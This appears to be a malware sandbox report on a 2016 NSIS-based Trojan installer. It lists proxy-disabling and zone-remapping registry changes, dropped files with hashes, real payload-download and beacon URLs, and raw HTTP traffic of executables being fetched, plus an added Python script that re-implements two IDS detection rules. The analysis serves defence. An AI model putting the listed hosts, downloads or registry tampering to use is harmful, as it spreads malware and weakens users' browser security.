"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe
67c42aeb90801b8b63596be833f409b3 c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Uninstall.exe
122ae907c9811b0779165a7030449eb2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe
542199ec8faa7cb170b8f663d62ada99 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa22.tmp
a3ed6f7ea493b9644125d494fbf9a1e6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\IpConfig.dll
8531346d16fa5d4768f6530d2eb2b65c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\WmiInspector.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\inetc.dll
058ba8a0916d957d3b91d08ea2e876e2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\t1.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf10.tmp\inetc.dll
8501f079ef3fc63721d0164b8a34b4a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoA.tmp
3fdbfc57c03c91b672af530efe849cb3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\zEuCD[1]
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\Validate[1].exe
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\CAW5CX8N.htm
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\KrMubhB0c[1]

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: setup
Product Version: 1.0.0.0
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23462 23552 4.51398 9d64b6ac6eb1aa41e38f6cc8798b652e
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 3774424 1024 3.26654 af685ae5a632e08acd6c90a62cdfc3bb
.ndata 3813376 73728 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 3887104 17192 17408 4.11146 9744c9d8118bab5893d7e4c284c0adee

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 843
9e690e54fcaaec9e5ab149fdc7b39849
42c7df5771aed3248e8f04ac2affda17
65a8ed347f955dc5b0cc72cd41edbda0
0474bc4cdbf6ebb28c41f29f08aff838
56f0773f477f9cd0340c0be299733fec
7d55f8587b19fc4f736b5142fafbf7d4
5ce92582e1a08a0ff321f9340e1050e4
94eefef5bbfc51c6b58cdd78d4d23a60
7360f94503b83a0a7583e4dd3b1a5da7
cead8cb9974398d8a97f11ecadffa99d
5c970638dc1d11b78456803966700f51
32781edd5bd0b472be7f9f3e7b066c17
680a542ac63edbf9b931b5db42883fb1
465c622d673d1c58e5bf257e4474113d
86772153d906b98a65d9a64a910117f6
13ddb0d6ec6ed13888cf211634187f29
00a69d79ba73b543914470b9087a11e8
4f2b2e2301f662eb0c2ef92d267711d2
8bf2fb9cdba8e11b9c67885900eb82d6
67df116b398f91b64eeab7c6fc280bb7
6f377cd73cbf924b48ba52c335a47c78
d4db355aaebca07562d248ae8b8c5635
2ef26b587dab0f74352943849596f24e
150711d4ed93d249436d8e851a9698e7
38aef307050ce93a00fd647bc1b34ef0

URLs

URL IP
hxxp://data.biphysics.com/r?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://www.download-servers.com/vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=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 95.211.210.34
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ 54.235.253.3
hxxp://www.download-servers.com/SysInfo/Validate.exe 95.211.210.34
hxxp://sstatic1.histats.com/0.gif?2601800&101 208.43.241.178
hxxp://www.download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://www.download-servers.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://sstatic1.histats.com/0.gif?2601768&101 208.43.241.178
hxxp://www.download-servers.com/SysInfo/countup.php?sid=554655542 95.211.210.34
hxxp://sstatic1.histats.com/0.gif?2601603&101 208.43.241.178
hxxp://data.biphysics.com/r?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://www.download-servers.com/SysInfo/tem.php?sid=83837567483 95.211.210.34
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://download-servers.com/SysInfo/Validate.exe 95.211.189.16
hxxp://mobilitydata5.com/SysInfo/countup.php?sid=554655542 95.211.189.16
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 95.211.189.16
hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Possible Windows executable sent when remote host claims to send html content
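The two verdicts above are worth understanding rather than just copying into a blocklist: the first fires on the User-Agent string hard-coded into the NSIS inetc plug-in (it also appears in the strings dumps further down), the second on a response whose Content-Type says text/html while the body starts with an MZ header, which is exactly what the dl.php exchange below shows. The following is an added example, not part of the Lavasoft report or of any Emerging Threats rule: it re-implements both checks in plain Python and runs them over three exchanges constructed from the traffic section (headers trimmed, bodies cut to their first bytes). The alert labels are shorthand chosen here; a real deployment would feed reassembled HTTP streams from the pcap instead of the inline samples.

```python
"""Added example (not from the Lavasoft report): plain-Python versions of the
two ET checks, run over exchanges constructed from the capture."""


def get_header(head, name):
    """Value of the first header called `name` (case-insensitive) in a raw
    request or response head, or None if absent."""
    for line in head.split("\r\n")[1:]:          # skip request/status line
        if ":" in line:
            key, value = line.split(":", 1)
            if key.strip().lower() == name.lower():
                return value.strip()
    return None


def is_nsis_inetc_ua(request_head):
    """ET POLICY User-Agent (NSIS_Inetc (Mozilla)): this UA comes from the NSIS
    inetc plug-in, never from a browser, so it marks an installer fetching
    further components on its own."""
    ua = get_header(request_head, "User-Agent") or ""
    return ua.startswith("NSIS_Inetc")


def is_pe_claiming_html(response_head, body_start):
    """ET MALWARE 'Windows executable sent when remote host claims to send html
    content': declared type is text/html but the body opens with the MZ
    signature of a DOS/PE image."""
    ctype = (get_header(response_head, "Content-Type") or "").split(";")[0]
    return ctype.strip().lower() == "text/html" and body_start[:2] == b"MZ"


def scan(exchanges):
    """Return (host, path, [alert labels]) for every exchange that fires."""
    hits = []
    for req, resp, body in exchanges:
        alerts = []
        if is_nsis_inetc_ua(req):
            alerts.append("ET POLICY NSIS_Inetc User-Agent")
        if is_pe_claiming_html(resp, body):
            alerts.append("ET MALWARE PE served as text/html")
        if alerts:
            hits.append((get_header(req, "Host"), req.split(" ", 2)[1], alerts))
    return hits


# Constructed from the capture: (request head, response head, first body bytes).
EXCHANGES = [
    # dl.php on download-servers.com: text/html declared, PE image delivered
    ("GET /vuupc/dl.php?rr=APc1&sct=AGR HTTP/1.1\r\n"
     "User-Agent: NSIS_Inetc (Mozilla)\r\n"
     "Host: VVV.download-servers.com\r\n"
     "Connection: Keep-Alive\r\n\r\n",
     "HTTP/1.1 200 OK\r\nServer: nginx/1.6.2\r\n"
     "Content-Type: text/html\r\nContent-Length: 253819\r\n\r\n",
     b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"),
    # histats beacon: same installer UA, but the body really is a GIF
    ("GET /0.gif?2601768&101 HTTP/1.1\r\n"
     "User-Agent: NSIS_Inetc (Mozilla)\r\n"
     "Host: sstatic1.histats.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\nContent-Length: 43\r\n\r\n",
     b"GIF89a\x01\x00\x01\x00\x80"),
    # countup.php: PE declared honestly as octet-stream, browser UA (control)
    ("GET /SysInfo/countup.php?sid=554655542 HTTP/1.1\r\n"
     "User-Agent: Mozilla/5.0\r\n"
     "Host: mobilitydata5.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
     "Content-Disposition: attachment; filename=zEuCD\r\n\r\n",
     b"MZ\x90\x00"),
]

if __name__ == "__main__":
    for host, path, alerts in scan(EXCHANGES):
        print(host + path, "->", "; ".join(alerts))
```

Note that the third exchange fires nothing: the same MZ body served as application/octet-stream is not covered by the second rule, which is why the histats-style UA check is the more reliable of the two for this installer family, and why a pcap review should still look at every download regardless of declared type.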

Traffic

GET /0.gif?2601768&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=5c27ba5e-d1jg-4b75-bd1b-bdc7b11d8566


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..


GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 13:55:55 GMT
Content-Type: text/html
Content-Length: 253819
Connection: keep-alive
X-Powered-By: PHP/5.5.32
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
.............J..............................................s........J
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]...`...0:..........................rsrc......
...J......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.

<<< skipped >>>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 184
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:59 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:56:09 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:56:10 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}


GET /SysInfo/countup.php?sid=554655542 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: application/octet-stream
Content-Length: 549001
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=zEuCD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
............P|..............................................s.......@|
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]:..........................rsrc......
..@|......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.

<<< skipped >>>

GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 13:56:10 GMT
Content-Type: application/octet-stream
Content-Length: 80466
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=KrMubhB0c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
............`&...........@.................................@........@&
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
..@&.....................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

<<< skipped >>>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}


GET /0.gif?2601603&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=5c27ba5e-d1jg-4b75-bd1b-bdc7b11d8566


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..


GET /r?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:54 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.8.1</center>..</body>..</html>..



GET /r/?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0......



GET /r?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:54 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.8.1</center>..</body>..</html>..



GET /r/?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..



GET /r?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.8.1</center>..</body>..</html>..



GET /r/?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..


GET /0.gif?2601800&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
